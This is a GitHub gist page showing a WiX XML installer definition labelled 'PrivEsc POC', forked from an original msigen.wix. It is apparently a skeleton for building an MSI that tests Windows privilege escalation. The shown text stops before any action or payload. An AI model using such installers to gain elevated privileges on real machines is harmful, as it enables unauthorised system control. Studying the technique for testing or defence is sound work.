Skip to content

Instantly share code, notes, and snippets.

View rishdang's full-sized avatar

Rishabh Dangwal rishdang

View GitHub Profile
@rishdang
rishdang / trimmed.wix
Last active April 26, 2018 09:34 — forked from xpn/msigen.wix
Trimmed & cleaned original code
<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="00000000-0000-0000-0000-111111111111" Name="PrivEsc POC" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="PrivEsc POC"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Component Id="ApplicationFiles" Guid="11111111-1111-1111-1111-222222222222"></Component>
</Directory>
<Feature Id="AppFiles" Level="1">